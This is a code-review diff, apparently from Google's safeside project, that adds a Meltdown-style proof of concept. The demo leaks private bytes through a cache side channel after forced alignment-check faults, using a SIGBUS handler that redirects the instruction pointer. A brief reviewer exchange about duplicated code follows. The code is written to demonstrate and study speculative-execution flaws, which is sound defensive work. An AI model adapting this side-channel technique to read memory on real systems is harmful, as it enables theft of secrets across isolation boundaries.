demos/meltdown_ac.cc

```diff
@@ -0,0 +1,151 @@
+size_t *disaligned_public_data = reinterpret_cast<size_t *>(
+    reinterpret_cast<char *>(public_array) + 1);
+
+// Storage for the private data.
+size_t *private_array = new size_t[strlen(private_data) + 1];
+// Disaligned array of private data shifted by one byte.
+size_t *disaligned_private_data = reinterpret_cast<size_t *>(
+    reinterpret_cast<char *>(private_array) + 1);
+
+static void initialize_disaligned_data() {
+  // Initialize disaligned arrays.
+  for (int i = 0; i < strlen(public_data); ++i) {
+    disaligned_public_data[i] = public_data[i];
+  }
+  for (int i = 0; i < strlen(private_data); ++i) {
+    disaligned_private_data[i] = private_data[i];
+  }
+}
+
+static char leak_byte(size_t *disaligned_data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % strlen(public_data);
+    sidechannel.FlushOracle();
+
+    // Successful execution accesses safe_offset and loads ForceRead code into
+    // cache.
+    ForceRead(isolated_oracle.data() + disaligned_data[safe_offset]);
+
+    EnforceAlignmentAndSerialize();
+
+    // Accesses unaligned data despite of the enforcement. Triggers SIGBUS.
+    ForceRead(isolated_oracle.data() + disaligned_data[offset]);
+
+    // Architecturally dead code. Never reached unless AM flag in CR0 is off.
+    std::cout << "Dead code. Must not be printed. "
+              << "Maybe you have to flip on the AM flag in CR0." << std::endl;
+
+    // The exit call must not be unconditional, otherwise clang would optimize
+    // out everything that follows it and the linking would fail.
+    if (strlen(public_data) != 0) {
+      exit(EXIT_FAILURE);
+    }
+
+    // SIGBUS signal handler moves the instruction pointer to this label.
+    asm volatile("afterspeculation:");
+
+    // We must turn off the enforcement for the cache hit computations, because
+    // otherwise it would trigger SIGBUS in C++ STL (e.g. strcmp invocations).
+    UnenforceAlignment();
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(public_data[safe_offset]);
+
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+static void sigbus(
+    int /* signum */, siginfo_t * /* siginfo */, void *context) {
+  // SIGBUS signal handler.
+  // Moves the instruction pointer to the "afterspeculation" label.
+  ucontext_t *ucontext = static_cast<ucontext_t *>(context);
+#ifdef __x86_64__
+  ucontext->uc_mcontext.gregs[REG_RIP] =
+      reinterpret_cast<greg_t>(afterspeculation);
+#else
+  ucontext->uc_mcontext.gregs[REG_EIP] =
+      reinterpret_cast<greg_t>(afterspeculation);
+#endif
+}
+
+static void set_signal() {
+  struct sigaction act;
+  act.sa_sigaction = sigbus;
+  act.sa_flags = SA_SIGINFO;
+  sigaction(SIGBUS, &act, NULL);
+}
```

Comment:
These are another ~20 lines that we're repeating through several examples. Maybe file an issue to follow up and look for a way to factor this out?

Reply:
https://github.com/google/safeside/issues/48